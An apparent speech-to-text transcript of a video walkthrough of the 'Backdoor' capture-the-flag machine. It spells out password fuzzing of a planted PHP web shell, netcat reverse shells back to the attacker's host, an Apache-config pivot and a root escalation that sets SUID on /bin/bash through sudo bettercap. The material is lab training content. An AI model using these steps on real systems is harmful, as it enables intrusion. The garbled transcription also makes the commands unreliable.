Hello guys, welcome back to Fitness Cloud. Today we're going to solve another CTF challenge named called a backdoor. So what's the basic penetration testing methodologies we used here? So the basic penetration testing methodologies we used here: network discovery, enumeration, exploitation, uh, web cell brute force, misconfiguration, abuse the reboot binary using a pivoting, and abuse the Bettercap binary. And we would like to exploit and get the root access. Now, we would like to get it done. So first of all, let's open the terminal. So in this case, so first you just type your sudo su, enter your password, then later you just type your unique discord minus I is 0. So first we would like to identify our target machine. So I have identified my target machine is here. Now just type your nmap minus 34 minus a and aggressive scan and enter your targeted IP address. Now let's wait for the nmap result. So I have got the nmap result. One is available with SH, another one is available with port 8. It's in Apache server. Now we would like to come back here. You just enter our target IP address 192.168.18.189. That's it. Just like an Apache server, so we would like to look the page source. In the page source also we not get any useful information. So let's just quit here, try to copy this one, come back. Now I would like to try to open a new tab also. Now let's we just try with as directory buster. Then let me just paste this. That's it. Now I would like to go with as a nectar minus hatch. Then let's just paste this. We not to get any useful information. Then I would like to go with as a gobuster directory list. Then I would like to try with as 189 here. Then we would like to look here. What is the useful information we are going to get here? So as of now, we not yet get any useful information. So we would like to wait. How long it may going to be take to get the results? I have got only with the server status. That's it. That is status is 403, but we cannot able to go over there. Now in this case, where we would like to look here, uh, in this case we not yet get any useful information. We would like to try here. So I have got a one of a useful information. I just try to copy this one. Now I try to visit here as a backdoor. That's it. It was a forbidden. Okay, quite good. If it a forbidden, let me. I would like to utilize here. Just let me just copy here. Let me just type here as clear. I just type list minus L. Let me just paste here. Uh, where we would like to go here as directory B. Okay. I would like to utilize here a common dot txt. Uh, it's quite good. Let me just utilize here. Let me just come back here. Now, directory B. What is this? Just get this. Command.txt. Here is a backdoor. That's it. We would like to look here. I didn't get any useful information here. So how we would like to try to get it here. Now, in this case, if you not yet get this one, let me just go back here. Now, you just use a checklist from GitHub. Go to here. Let's go to here in the discovery. Then come to here as a web content. So which one we would like to take here? Uh, let's common and Dutch, Italian combined. So we not yet any useful information from here. Uh, common directories. So how we would like to try to exploit here? To look here. Common directories, otherwise a common.txt. Let me, I try to open in this one in the new tab. So this also have a lengthy things. When you go back here to cross check, let's, you would like to try to check. No, we're not yet going to be a check in this way. Let me. I would like to try to copy entirely of this one. Just try to copy. Come back here. You would like to try with as micro minus h, then try to paste here. Then we would like to try to look here. So if this is allowed for a get, post and head, the anti-click joking experience is possible here. Now, we would like to try how we would like to exploit this one. No, we not get anything else. Now, let me. I would like to utilize, in this case, let me. I just put here as a directory buster, then uh, directory plus 2.3 medium.txt. Then I would like to put for a PHP files. That's it. I would like to try to get here. What else have the PHP list that I would like to try to get? Let I would like to check that one. Then common directories. We would like to look here. We not yet get directories common backdoors. Like this. So I think common backdoors for a PHP. So our targeted website is in the PHP. Let's we would like to try our common backs this one. So either PHP backdoor.php or whichever it is, we would like to try to take it out. Now let me. I just try to copy it entirely. Now I would like to put here as. Let me just type here as clear. I just put here as nano. Uh, common.txt. Let me just paste it entirely. Yeah, quite good. Control O, Control X. That's great. Now let me just close this. Common.txt. That's it. So I have identified the backdoor here, a PHP backdoor.php. Quite interesting here. So sometimes you need to investigate a lot of things. Then only you can get here. Where you have got here a secure a website. Now, once you have got this, so again, in this case, let me, you would like to look the pesos. In this peso, there is nothing else apart from here. PHP backdoor.php we have identified. Now let me just type here as clear. Now, once you have identified this secure shell, now we would like to try to go for to foots this one. Now let me, we would like to go for as wz foots uh, minus c and minus u is, let me just paste my target URL. Then word list is user share word list, then rocky.txt. That's it. Then once you have identified this rocky.txt, then I would like to identify here as a for a password equal to, I would like to type a foods and c cmd equal to id. That's it. Then two is greater than dev r. Now that's it here. Let's try what we are going to get here. So we are getting here a lot of lengthy things. So how we would like to identify the right parameter. So it may be like a password one. Let we would like to try a multiple ways. Let me, I would like to try here without putting this. Then later we would like to look. It's also the same thing. So we would like to try here. I would like to remove this. I would like to try it as a 34. There. We would like to look. Uh, what is the password we are going to get here? So we are hard to get this password. It's like it's only the password in password places, but we are not going to get the right password here. Otherwise, we would like to try with as website. We would like to take this website. So sometimes it may be a fail to get the right password. So where we have got this as that we would like to look this entirely now as pesos. In the pesos, it's only we are getting here as a secure website. That's it. Apart from we not to get anything else. So this is more unnecessary things here. Okay. Now, now we would like to try to find the right password. Let we would like to try here as C minus h h w equal to 34. What else is user share? Wordless air rocky.txt. Then uh, password equal to try to puts and cmd equal to as a id dot set minus u equal to, let's come back, copy, come back here, let's just paste it. Now it may can get the right password. We would like to look here. We open the website, but it's not work out. Let's see here. If again it's put us with a multiple passwords, we can't able to get here. So in this case, I just put here as a HH is 1432. If that also is jumping again, We would like to try here again one more time. For this case, in the data, the password equal to foods and CM. Now it was fuzzy. Now we would like to try to identify the right password. So in order to give you need to give entirely in order. Otherwise, it will not going to be take. We prefer not to say how long it's going to be a take. Now, we would like to look here. Let me just write here as clear. Remove this. Now, you just put here as curl minus s. Then you just put here as a HTTP. We already have. Let me just go back here. Just copy this one. Come back here. Let's just paste here a backdoor.php. Then you need to send that data to a password equal to password name. We just give gap here. Our CMD equal to as a ID. Then you need to print a tail n minus 1. Let's come back. I have identified the password is new password. Just copy. Now just come back here. Let's just paste there. Now you can see here you are getting here www.data. So we are ready to exploit this one now. Now utilize as a same thing. Now you can quit this. We know how to make it as clear. You just put here as netcat minus lvnp 7890. Now in the ID place, let's just put here as netcat netcat enter your targeted IP address 192.168.18.122 and port is 7890 minus E bin RSH. That's it. Here, where you have successfully get a connected here. You just look here as which Python you know did get here. You just type here as which Python 3 you have got here. Just type here as Python 3 minus C. Import as pdy span bin bash. Where we have got it here, just type export term equal to extra. Let me just type here as clear. You just type plus minus here. We have got this php backdoor.php. Now we would like to go here as fairborn directory plus minus a cd as a rootkit. Permission is denied. Sudo minus f, where it is with a reboot. User has been with the reboot. Now we would like to try here as a find where I would like to writable, then type of f2 is greater than dev or null, then grep minus ve proc as sys or variable. Now we would like to find here a etc Apache 2 Apache 2 as a config. Quite interesting. Now I would like to try to write here as echo minus en. Let me just put here as a user as a rootkit. Then and I would like to write here as a group also as a rootkit. Now let's just need to write entirely this one. etc Apache 2 as Apache 2 config. That's it. Now I have write this everything clear. Now I want to read this. Take minus n2. Then just put here as a echo. Where we have got here user is rootkit, group is rootkit. Quite interesting. Now let's just try here as sudo minus u as a root. What is this to go here? User has been reboot. It's exit automatically. Now I just put here as now again as 443. Now what it exit here, we prefer not to say 443. Then let we have get connected again here. Now I was logging as a rootkit. Quite interesting. Now just put here as a ID, host name. Quite interesting. I got here as host name as Backdoor. Just try here as which Python. Not get. Just type here as a Python 3 minus C. Import as a PDY. PDY span bin bash. Quite interesting. I just put here as a export top equal to x top. Quite interesting. Now let's just try here as clear. Let's just try. So we just came here directly here. Now just go to here as home directory. Ls minus r cd as a rootkit ls minus r cat user.txt. We have identified the user flag. Let's just come back. Now just write here as sudo minus l to go for a root privilege access. Now here you can see our user being a Bettercap. Quite interesting here. Now I would like to utilize a new tab for to exploit this one. Now here we just put here as sudo minus u a root to go for us user bin Bettercap. Now I want to try here as a help. I have done a multiple times about this Bettercap, how to exploit and how to read multiple devices of communication. Now let's just put here as list minus l in the bin bash. Okay, it's we are showing here root. Okay, now let's just give a permission chmod 1234 1234 376 4755. Let's just put here as a bin bash. Now let's just put here again list minus f with the bin bash. Now we have read write permissions on every here. Quite interesting here. Now you want to get in the another shell. We just write in this way. Netcat enter your targeted IP address port name minus e bin sh. So there you can put the listening cat port over there. You can get directly over there. Either you don't want in that. You just try here as simple as exit. Now let me just write here as clear. Now just write here as bin bash minus pi. It will ask now who am I? We are in the root. Which Python we are got it here. Just type here as in which part of 3 we have got here. You just type here as button 3 minus C. Import as pdy span bin bash. It's not getting here. cd as a root. It's also a permission is denied. So you type here as exit, okay. Uh, in this case, the permission is denied. We cannot able to go and get it here as to get the root privilege. Okay. Now, what we do here is let's we would like to utilize here the whole thing. Sudo minus u is a root. Sudo minus l. Sudo minus u as a root. User pane Bettercap. So the first one is not going to be executed. Now we are trying with the second one. Now you just try here as a ID. We are in the root access here. Now our only one target is Netcat minus LVNP, and just put here as 0000. Okay, invalid local port. Okay. Uh, 1000. Okay. Now let's just come back here. Let me just put here as Netcat. Then the Netcat, what you would like to try in the Netcat is minus E as a bin uh, bash. So we already put the bash. Enter our target. IP address 192.168.18.120. 122 and 1000. That's it. Where you can see here it's connected. ID root. You just type here as a which Python you not get. You just type here as which Python 3. You have got it here. You just type here as Python 3 minus C. Import as pdy span bin bash. Now just type here as cd as root. We have got it here list minus l cat a root dot list. Quite we have successfully exploited and get the root privilege access. That's it. So you try to run, guys. Thank you guys for watching and keep smiling.